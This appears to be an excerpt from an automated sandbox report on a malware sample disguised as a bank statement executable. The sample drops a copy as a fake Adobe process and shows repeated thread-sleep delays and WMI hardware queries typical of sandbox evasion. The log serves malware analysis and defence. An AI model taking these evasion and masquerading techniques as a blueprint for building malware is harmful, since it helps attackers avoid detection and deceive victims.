Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596588s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596480s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596373s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596248s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596134s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595149s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe TID: 7764	Thread sleep time: -594592s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -37815825351104557s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8088	Thread sleep count: 6119 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599650s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8088	Thread sleep count: 3721 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599433s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599309s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599168s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -599061s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598842s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598624s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -598075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597749s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597309s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597202s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -596983s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -596874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -596201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595749s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595634s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595530s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595202s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -594109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -593999s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8084	Thread sleep time: -593852s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2568	Thread sleep count: 3458 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2568	Thread sleep count: 6382 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598139s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597801s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597555s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597445s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597336s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597199s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595119s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594858s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594727s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594591s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594436s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594322s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1904	Thread sleep time: -593984s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598900	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598582	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596588	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596480	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596373	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596134	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595149	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Thread delayed: delay time: 594592	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599650	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599309	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599061	Jump to behavior
